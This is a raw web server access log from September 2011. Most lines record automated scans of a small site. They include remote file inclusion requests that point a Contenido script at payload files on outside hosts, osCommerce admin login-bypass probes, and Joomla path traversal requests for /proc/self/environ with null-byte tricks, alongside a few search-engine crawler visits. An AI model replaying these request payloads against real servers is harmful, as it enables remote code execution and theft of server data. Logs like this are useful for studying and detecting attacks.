188.165.198.194 - - [07/Sep/2011:08:21:34 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kamskistudio.pl/ftp_kamol/c.txt??? HTTP/1.1" 404 368 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:21:35 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www2.takjour.se/intranet/kunder/_notes/tile.jpg??? HTTP/1.1" 404 368 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:21:36 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 377 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:21:37 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rebelution.gr/cache/net/images/logo2.jpg HTTP/1.1" 404 377 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:21:37 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kamskistudio.pl/ftp_kamol/c.txt??? HTTP/1.1" 404 377 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:21:39 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www2.takjour.se/intranet/kunder/_notes/tile.jpg??? HTTP/1.1" 404 377 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
195.114.1.41 - - [07/Sep/2011:08:22:42 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 392 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:22:43 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rebelution.gr/cache/net/images/logo2.jpg HTTP/1.1" 404 392 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:22:43 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kamskistudio.pl/ftp_kamol/c.txt??? HTTP/1.1" 404 392 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:22:45 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www2.takjour.se/intranet/kunder/_notes/tile.jpg??? HTTP/1.1" 404 392 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:22:46 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 368 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:22:47 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rebelution.gr/cache/net/images/logo2.jpg HTTP/1.1" 404 368 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:22:47 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kamskistudio.pl/ftp_kamol/c.txt??? HTTP/1.1" 404 368 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:22:49 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www2.takjour.se/intranet/kunder/_notes/tile.jpg??? HTTP/1.1" 404 368 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:22:50 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 377 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:22:51 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rebelution.gr/cache/net/images/logo2.jpg HTTP/1.1" 404 377 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:22:51 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kamskistudio.pl/ftp_kamol/c.txt??? HTTP/1.1" 404 377 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:22:53 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www2.takjour.se/intranet/kunder/_notes/tile.jpg??? HTTP/1.1" 404 377 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
91.121.8.126 - - [07/Sep/2011:08:23:49 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.8.126 - - [07/Sep/2011:08:23:49 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.8.126 - - [07/Sep/2011:08:23:49 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.8.126 - - [07/Sep/2011:08:23:49 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.8.126 - - [07/Sep/2011:08:23:49 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.8.126 - - [07/Sep/2011:08:23:49 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
188.165.198.194 - - [07/Sep/2011:08:30:33 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','9','9','%22%2Fcontenido%2Fincludes%2F%22','',%20'00ca3db5ccdbe6a1ab8fa727dcc5d8ee82998f25213e5e648723',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 587 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:30:34 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','9','9','%22%2Fcontenido%2Fincludes%2F%22','',%20'00ca3db5ccdbe6a1ab8fa727dcc5d8ee82998f25213e5e648723',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rebelution.gr/cache/net/images/logo2.jpg HTTP/1.1" 404 587 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:30:34 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','9','9','%22%2Fcontenido%2Fincludes%2F%22','',%20'00ca3db5ccdbe6a1ab8fa727dcc5d8ee82998f25213e5e648723',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kamskistudio.pl/ftp_kamol/c.txt??? HTTP/1.1" 404 587 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:30:35 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','9','9','%22%2Fcontenido%2Fincludes%2F%22','',%20'00ca3db5ccdbe6a1ab8fa727dcc5d8ee82998f25213e5e648723',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www2.takjour.se/intranet/kunder/_notes/tile.jpg??? HTTP/1.1" 404 587 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:30:37 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 368 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:30:38 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rebelution.gr/cache/net/images/logo2.jpg HTTP/1.1" 404 368 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:30:38 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kamskistudio.pl/ftp_kamol/c.txt??? HTTP/1.1" 404 368 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:30:39 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www2.takjour.se/intranet/kunder/_notes/tile.jpg??? HTTP/1.1" 404 368 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:30:40 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 377 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:30:41 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rebelution.gr/cache/net/images/logo2.jpg HTTP/1.1" 404 377 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:30:42 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kamskistudio.pl/ftp_kamol/c.txt??? HTTP/1.1" 404 377 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:30:43 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www2.takjour.se/intranet/kunder/_notes/tile.jpg??? HTTP/1.1" 404 377 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:31:40 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 377 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:31:41 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rebelution.gr/cache/net/images/logo2.jpg HTTP/1.1" 404 377 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:31:41 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kamskistudio.pl/ftp_kamol/c.txt??? HTTP/1.1" 404 377 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:31:42 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www2.takjour.se/intranet/kunder/_notes/tile.jpg??? HTTP/1.1" 404 377 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:31:43 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 368 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:31:44 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rebelution.gr/cache/net/images/logo2.jpg HTTP/1.1" 404 368 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:31:45 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kamskistudio.pl/ftp_kamol/c.txt??? HTTP/1.1" 404 368 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
188.165.198.194 - - [07/Sep/2011:08:31:46 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www2.takjour.se/intranet/kunder/_notes/tile.jpg??? HTTP/1.1" 404 368 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
195.114.1.41 - - [07/Sep/2011:08:39:05 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 392 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:39:07 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rebelution.gr/cache/net/images/logo2.jpg HTTP/1.1" 404 392 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:39:07 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kamskistudio.pl/ftp_kamol/c.txt??? HTTP/1.1" 404 392 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:39:08 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www2.takjour.se/intranet/kunder/_notes/tile.jpg??? HTTP/1.1" 404 392 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:39:09 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 368 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:39:11 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rebelution.gr/cache/net/images/logo2.jpg HTTP/1.1" 404 368 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:39:11 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kamskistudio.pl/ftp_kamol/c.txt??? HTTP/1.1" 404 368 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:39:12 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www2.takjour.se/intranet/kunder/_notes/tile.jpg??? HTTP/1.1" 404 368 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:39:13 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 377 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:39:15 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rebelution.gr/cache/net/images/logo2.jpg HTTP/1.1" 404 377 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:39:15 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kamskistudio.pl/ftp_kamol/c.txt??? HTTP/1.1" 404 377 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.114.1.41 - - [07/Sep/2011:08:39:16 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www2.takjour.se/intranet/kunder/_notes/tile.jpg??? HTTP/1.1" 404 377 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
193.47.80.51 - - [07/Sep/2011:10:13:22 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.51 - - [07/Sep/2011:10:13:22 +0000] "GET /?C=N;O=A HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.51 - - [07/Sep/2011:10:13:25 +0000] "GET /?C=M;O=A HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.51 - - [07/Sep/2011:10:13:27 +0000] "GET /?C=S;O=D HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
217.27.212.44 - - [07/Sep/2011:11:11:15 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)"
217.27.212.44 - - [07/Sep/2011:11:11:15 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)"
173.236.49.171 - - [07/Sep/2011:11:11:23 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.805"
173.236.49.171 - - [07/Sep/2011:11:11:23 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.805"
91.121.28.191 - - [07/Sep/2011:11:11:41 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [07/Sep/2011:11:11:41 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [07/Sep/2011:11:44:54 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [07/Sep/2011:11:44:54 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [07/Sep/2011:12:24:19 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [07/Sep/2011:12:24:19 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
180.76.5.156 - - [07/Sep/2011:14:12:32 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
67.195.115.166 - - [07/Sep/2011:15:15:02 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [07/Sep/2011:15:15:02 +0000] "GET /Account/?C=M;O=A HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
123.125.71.109 - - [07/Sep/2011:17:12:43 +0000] "GET /?C=M;O=A HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
67.195.115.166 - - [07/Sep/2011:17:25:41 +0000] "GET /?C=S;O=A HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
119.63.196.104 - - [07/Sep/2011:17:52:59 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
173.236.49.171 - - [07/Sep/2011:18:03:45 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.805"
173.236.49.171 - - [07/Sep/2011:18:03:45 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.805"
208.80.194.29 - - [07/Sep/2011:20:21:53 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR Enabled; SIMBAR={D7ECCE72-597A-4630-BE66-BD3B0F523C05}; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1)"
208.115.111.73 - - [07/Sep/2011:21:01:21 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
210.127.253.246 - - [07/Sep/2011:21:06:50 +0000] "GET /Account/access_log.txt/admin/categories.php/login.php HTTP/1.1" 404 368 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:06:54 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:06:55 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','19','9','%22%2Fadmin%2Fcategories.php%22++catalog','',%20'00f1b8fe025563e809344017e080e365f02be45a3805d461d9bf',%200)/admin/banner_manager.php/login.php HTTP/1.1" 404 578 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:06:55 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:06:56 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:06:56 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:06:57 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','19','9','%22%2Fadmin%2Fcategories.php%22++catalog','',%20'00de77238c5563e809344017e080e365f02be45a382a1bbc50e7',%200)/admin/categories.php/login.php HTTP/1.1" 404 574 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:06:57 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:06:58 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:07:05 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','19','9','%22%2Fadmin%2Fcategories.php%22++catalog','',%20'00a2e738e15563e809344017e080e365f02be45a38568ba73292',%200)/admin/file_manager.php/login.php HTTP/1.1" 404 576 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:07:08 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:07:09 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:07:13 +0000] "GET /Account/access_log.txt/admin/file_manager.php/login.php HTTP/1.1" 404 370 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:07:14 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:07:14 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:07:26 +0000] "GET /Account/access_log.txt/admin/banner_manager.php/login.php HTTP/1.1" 404 372 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:07:27 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
210.127.253.246 - - [07/Sep/2011:21:07:27 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
208.115.227.12 - - [07/Sep/2011:22:18:47 +0000] "GET /Account/access_log.txt/?option=com_google&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 338 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
208.115.227.12 - - [07/Sep/2011:22:18:47 +0000] "GET /?option=com_google&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 749 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
208.115.227.12 - - [07/Sep/2011:22:18:48 +0000] "GET /Account/?option=com_google&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 927 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
208.115.227.12 - - [07/Sep/2011:22:18:48 +0000] "GET /Account/access_log.txt/?option=com_google&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 338 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
208.115.227.12 - - [07/Sep/2011:22:18:49 +0000] "GET /?option=com_google&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 749 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
208.115.227.12 - - [07/Sep/2011:22:18:49 +0000] "GET /Account/?option=com_google&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 927 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
